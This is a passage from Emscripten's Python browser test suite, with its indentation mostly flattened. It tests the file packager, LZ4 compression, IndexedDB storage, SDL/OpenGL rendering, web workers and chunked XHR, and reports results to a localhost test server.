Popen([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', os.path.join('sub', 'file2.txt'), '--separate-metadata', '--js-output=files.js']).communicate()
self.btest(os.path.join('fs', 'test_workerfs_package.cpp'), '1', args=['--proxy-to-worker'])
def test_fs_lz4fs_package(self):
# generate data
import random
self.clear()
os.mkdir('subdir')
open('file1.txt', 'wb').write('0123456789' * (1024*128))
open(os.path.join('subdir', 'file2.txt'), 'wb').write('1234567890' * (1024*128))
random_data = [chr(random.randint(0,255)) for x in range(1024*128*10 + 1)]
random_data[17] = 'X'
open('file3.txt', 'wb').write(''.join(random_data))
# compress in emcc, -s LZ4=1 tells it to tell the file packager
print 'emcc-normal'
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'], timeout=60)
assert os.stat('file1.txt').st_size + os.stat(os.path.join('subdir', 'file2.txt')).st_size + os.stat('file3.txt').st_size == 3*1024*128*10 + 1
assert os.stat('test.data').st_size < (3*1024*128*10)/2 # over half is gone
print ' emcc-opts'
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'], timeout=60)
# compress in the file packager, on the server. the client receives compressed data and can just use it. this is typical usage
print 'normal'
out = subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1'], timeout=60)
print ' opts'
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-O2'], timeout=60)
# load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended
print 'manual'
subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1'], timeout=60)
print ' opts'
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-O2'], timeout=60)
print ' opts+closure'
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-O2', '--closure', '1', '-g1'], timeout=60)
'''# non-lz4 for comparison
try:
os.mkdir('files')
except:
pass
shutil.copyfile('file1.txt', os.path.join('files', 'file1.txt'))
shutil.copyfile('file2.txt', os.path.join('files', 'file2.txt'))
shutil.copyfile('file3.txt', os.path.join('files', 'file3.txt'))
out = subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'], timeout=60)'''
def test_idbstore(self):
secret = str(time.time())
for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
self.clear()
self.btest(path_from_root('tests', 'idbstore.c'), str(stage), force_c=True, args=['-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
def test_idbstore_sync(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync.c'), '6', force_c=True, args=['-DSECRET=\"' + secret + '\"', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '--memory-init-file', '1', '-O3', '-g2'])
def test_idbstore_sync_worker(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync_worker.c'), '6', force_c=True, args=['-DSECRET=\"' + secret + '\"', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-s', 'TOTAL_MEMORY=75000000'])
def test_force_exit(self):
self.btest('force_exit.c', force_c=True, expected='17')
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
''')
self.btest('sdl_pumpevents.c', expected='7', args=['--pre-js', 'pre.js'])
def test_sdl_canvas_size(self):
self.btest('sdl_canvas_size.c', expected='1',
args=['-O2', '--minify', '0', '--shell-file', path_from_root('tests', 'sdl_canvas_size.html')])
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
open(os.path.join(self.get_dir(), 'sdl_gl_read.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_gl_read.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_gl_read.c'), '-o', 'something.html']).communicate()
self.run_browser('something.html', '.', '/report_result?1')
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-s', 'FULL_ES3=1'],
message='You should see a blue triangle.')
def test_sdl_ogl(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with gray at the top.')
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with gray at the top.')
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with gray at the top.')
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-s', 'INLINING_LIMIT=1', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'])
def test_sdl_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_glfw(self):
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1'])
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_GLFW=2'])
def test_glfw_minimal(self):
self.btest('glfw_minimal.c', '1', args=[])
self.btest('glfw_minimal.c', '1', args=['-s', 'USE_GLFW=2'])
def test_egl(self):
open(os.path.join(self.get_dir(), 'test_egl.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'test_egl.c')).read()))
Popen([PYTHON, EMCC, '-O2', os.path.join(self.get_dir(), 'test_egl.c'), '-o', 'page.html']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_egl_width_height(self):
open(os.path.join(self.get_dir(), 'test_egl_width_height.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'test_egl_width_height.c')).read()))
Popen([PYTHON, EMCC, '-O2', os.path.join(self.get_dir(), 'test_egl_width_height.c'), '-o', 'page.html']).communicate()
self.run_browser('page.html', 'Should print "(300, 150)" -- the size of the canvas in pixels', '/report_result?1')
def test_worker(self):
# Test running in a web worker
open('file.dat', 'w').write('data for worker')
html_file = open('main.html', 'w')
html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''')
html_file.close()
# run both without and with preloaded file data
for file_data in [0, 1]:
print 'file data', file_data
output = Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else []) , stdout=PIPE, stderr=PIPE).communicate()
assert len(output[0]) == 0, output[0]
assert os.path.exists('worker.js'), output
if not file_data: self.assertContained('you should not see this text when in a worker!', run_js('worker.js')) # code should run standalone
self.run_browser('main.html', '', '/report_result?hello%20from%20worker,%20and%20|' + ('data%20for%20w' if file_data else '') + '|')
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
html_file = open(main, 'w')
html_file.write(r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""")
html_file.close()
c_source_filename = "checksummer.c"
prejs_filename = "worker_prejs.js"
prejs_file = open(prejs_filename, 'w')
prejs_file.write(r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["stderr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
prejs_file.close()
# note: the source is compiled directly from the tests tree via path_from_root,
# rather than from a copy placed in the test dir with os.path.join(self.get_dir(), ...)
Popen([PYTHON, EMCC, path_from_root('tests', c_source_filename), '-g', '-s', 'SMALL_CHUNKS=1', '-o', worker_filename,
'--pre-js', prejs_filename]).communicate()
chunkSize = 1024
data = os.urandom(10*chunkSize+1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data)
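# note: on Python 2, zlib.adler32 can return a negative (signed) value for
# large inputs; the server side presumably computes it the same way, so the
# reported string still matches.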
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True,chunkSize,data,checksum,))
server.start()
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
server.terminate()
# Avoid a race condition on cleanup: wait a bit so the child processes have released their
# file locks; otherwise test tearDown's rmdir() can fail on files that are still in use.
if WINDOWS:
time.sleep(2)
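# The server target above, test_chunked_synchronous_xhr_server, is defined
# elsewhere in this file. For illustration only, a minimal sketch of the kind
# of byte-range server such a test needs (names and details here are
# hypothetical, not the harness's actual implementation):
def _example_chunked_server_sketch(data, port=11111):
  import re
  import BaseHTTPServer # Python 2 stdlib, matching this file
  class Handler(BaseHTTPServer.BaseHTTPRequestHandler):
    def do_GET(self):
      # serve only the requested byte range, so a SMALL_CHUNKS build can
      # fetch the lazy file piecewise with synchronous XHRs
      m = re.match(r'bytes=(\d+)-(\d+)', self.headers.get('Range', ''))
      start, end = (int(m.group(1)), int(m.group(2))) if m else (0, len(data) - 1)
      chunk = data[start:end + 1]
      self.send_response(206 if m else 200)
      if m:
        self.send_header('Content-Range', 'bytes %d-%d/%d' % (start, end, len(data)))
      self.send_header('Content-Length', str(len(chunk)))
      # the test page is served from port 8888, so allow cross-origin reads
      self.send_header('Access-Control-Allow-Origin', 'http://localhost:8888')
      self.end_headers()
      self.wfile.write(chunk)
  BaseHTTPServer.HTTPServer(('localhost', port), Handler).serve_forever()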
def test_glgears(self):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS'], outfile='something.html',
message='You should see animating gears.')
def test_glgears_long(self):
for proxy in [0, 1]:
print 'proxy', proxy
self.btest('hello_world_gles.c', expected=map(str, range(30, 500)), args=['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST'] + (['--proxy-to-worker'] if proxy else []), timeout=30)
def test_glgears_animation(self):
es2_suffix = ['', '_full', '_full_944']
for full_es2 in [0, 1, 2]:
print full_es2
Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_gles%s.c' % es2_suffix[full_es2]), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING=1',
'--shell-file', path_from_root('tests', 'hello_world_gles_shell.html')] +
(['-s', 'FULL_ES2=1'] if full_es2 else []),
).communicate()
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
def test_fulles2_sdlproc(self):
self.btest('full_es2_sdlproc.c', '1', args=['-s', 'GL_TESTING=1', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2=1'])
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS'], outfile='something.html',
message='You should see animating gears.')
with open('something.html') as f:
assert 'gl-matrix' not in f.read(), 'Should not include glMatrix when not needed'
def test_glbook(self):
programs = self.get_library('glbook', [
os.path.join('Chapter_2', 'Hello_Triangle', 'CH02_HelloTriangle.bc'),
os.path.join('Chapter_8', 'Simple_VertexShader', 'CH08_SimpleVertexShader.bc'),
os.path.join('Chapter_9', 'Simple_Texture2D', 'CH09_SimpleTexture2D.bc'),
os.path.join('Chapter_9', 'Simple_TextureCubemap', 'CH09_TextureCubemap.bc'),
os.path.join('Chapter_9', 'TextureWrap', 'CH09_TextureWrap.bc'),
os.path.join('Chapter_10', 'MultiTexture', 'CH10_MultiTexture.bc'),
os.path.join('Chapter_13', 'ParticleSystem', 'CH13_ParticleSystem.bc'),
], configure=None)
def book_path(*pathelems):
return path_from_root('tests', 'glbook', *pathelems)
for program in programs:
print program
basename = os.path.basename(program)
args = []
if basename == 'CH10_MultiTexture.bc':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), os.path.join(self.get_dir(), 'basemap.tga'))
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), os.path.join(self.get_dir(), 'lightmap.tga'))
args = ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.bc':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), os.path.join(self.get_dir(), 'smoke.tga'))
args = ['--preload-file', 'smoke.tga', '-O2'] # test optimizations here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.bc', '.png')), args=args, timeout=30)
def test_gles2_emulation(self):
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'basemap.tga'), self.in_dir('basemap.tga'))
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'lightmap.tga'), self.in_dir('lightmap.tga'))
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_13', 'ParticleSystem', 'smoke.tga'), self.in_dir('smoke.tga'))
for source, reference in [
(os.path.join('glbook', 'Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), path_from_root('tests', 'glbook', 'CH02_HelloTriangle.png')),
#(os.path.join('glbook', 'Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), path_from_root('tests', 'glbook', 'CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureWrap.png')),
#(os.path.join('glbook', 'Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), path_from_root('tests', 'glbook', 'CH09_SimpleTexture2D.png')),
(os.path.join('glbook', 'Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), path_from_root('tests', 'glbook', 'CH10_MultiTexture.png')),
(os.path.join('glbook', 'Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), path_from_root('tests', 'glbook', 'CH13_ParticleSystem.png')),
]:
print source
self.btest(source,
reference=reference,
args=['-I' + path_from_root('tests', 'glbook', 'Common'),
path_from_root('tests', 'glbook', 'Common', 'esUtil.c'),
path_from_root('tests', 'glbook', 'Common', 'esShader.c'),
path_from_root('tests', 'glbook', 'Common', 'esShapes.c'),
path_from_root('tests', 'glbook', 'Common', 'esTransform.c'),
'-s', 'FULL_ES2=1',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'])
def test_emscripten_api(self):
self.btest('emscripten_api_browser.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_third']'''])
def test_emscripten_api2(self):
def setup():
open('script1.js', 'w').write('''
Module._set(456);
''')
open('file1.txt', 'w').write('first')
open('file2.txt', 'w').write('second')
setup()
Popen([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w')).communicate()
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']'''])
# check using file packager to another dir
self.clear()
setup()
os.mkdir('sub')
Popen([PYTHON, FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w')).communicate()
shutil.copyfile(os.path.join('sub', 'test.data'), 'test.data')
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']'''])
def test_emscripten_api_infloop(self):
self.btest('emscripten_api_browser_infloop.cpp', '7')
def test_emscripten_fs_api(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png')) # preloaded *after* run
self.btest('emscripten_fs_api_browser.cpp', '1')
def test_emscripten_fs_api2(self):
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=0"])
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=1"])
def test_emscripten_main_loop(self):
self.btest('emscripten_main_loop.cpp', '0')
def test_emscripten_main_loop_settimeout(self):
self.btest('emscripten_main_loop_settimeout.cpp', '1')
def test_emscripten_main_loop_and_blocker(self):
self.btest('emscripten_main_loop_and_blocker.cpp', '0')
def test_emscripten_main_loop_setimmediate(self):
for args in [[], ['--proxy-to-worker']]:
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=args)
def test_sdl_quit(self):
self.btest('sdl_quit.c', '1')
def test_sdl_resize(self):
self.btest('sdl_resize.c', '1')
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1')
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1')
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1'])
def test_sdlglshader2(self):
self.btest('sdlglshader2.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True)
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1')
def test_gl_textures(self):
self.btest('gl_textures.cpp', '0')
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'], reference_slack=1)
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'], reference_slack=1)
def test_gl_ps_strides(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'])
def test_gl_ps_worker(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1'])
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1'])
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1'])
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1'], reference_slack=1)
def test_gles2_uniform_arrays(self):
self.btest('gles2_uniform_arrays.cpp', args=['-s', 'GL_ASSERTIONS=1'], expected=['1'], also_proxied=True)
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-s', 'GL_ASSERTIONS=1'], expected=['1'])
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328'], args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_pre(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'RELOCATABLE=1'])
def test_cubegeom_pre2(self):
self.btest('cubegeom_pre2.c', reference='cubegeom_pre2.png', args=['-s', 'GL_DEBUG=1', '-s', 'LEGACY_GL_EMULATION=1']) # some coverage for GL_DEBUG not breaking the build
def test_cubegeom_pre3(self):
self.btest('cubegeom_pre3.c', reference='cubegeom_pre2.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom(self):
self.btest('cubegeom.c', reference='cubegeom.png', args=['-O2', '-g', '-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True)
def test_cubegeom_proc(self):
open('side.c', 'w').write(r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
for opts in [0, 1]:
self.btest('cubegeom_proc.c', reference='cubegeom.png', args=['-O' + str(opts), 'side.c', '-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_glew(self):
self.btest('cubegeom_glew.c', reference='cubegeom.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_color(self):
self.btest('cubegeom_color.c', reference='cubegeom_color.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_normal(self):
self.btest('cubegeom_normal.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True)
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest('cubegeom_normal_dap.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True)
def test_cubegeom_normal_dap_far(self): # indices do not start from 0
self.btest('cubegeom_normal_dap_far.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest('cubegeom_normal_dap_far_range.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest('cubegeom_normal_dap_far_glda.c', reference='cubegeom_normal_dap_far_glda.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest('cubegeom_normal_dap_far_glda_quad.c', reference='cubegeom_normal_dap_far_glda_quad.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_mt(self):
self.btest('cubegeom_mt.c', reference='cubegeom_mt.png', args=['-s', 'LEGACY_GL_EMULATION=1']) # multitexture
def test_cubegeom_color2(self):
self.btest('cubegeom_color2.c', reference='cubegeom_color2.png', args=['-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True)
def test_cubegeom_texturematrix(self):
self.btest('cubegeom_texturematrix.c', reference='cubegeom_texturematrix.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_fog(self):
self.btest('cubegeom_fog.c', reference='cubegeom_fog.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_pre_vao(self):
self.btest('cubegeom_pre_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_pre2_vao(self):
self.btest('cubegeom_pre2_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_pre2_vao2(self):
self.btest('cubegeom_pre2_vao2.c', reference='cubegeom_pre2_vao2.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_u4fv_2(self):
self.btest('cubegeom_u4fv_2.c', reference='cubegeom_u4fv_2.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
self.btest('cubegeom_u4fv_2.c', reference='cubegeom_u4fv_2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'SPLIT_MEMORY=16777216']) # check for uniform4fv slice being valid in split memory
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True)
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-s', 'LEGACY_GL_EMULATION=1'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins'], reference_slack=3)
def test_sdl_gfx_primitives(self):
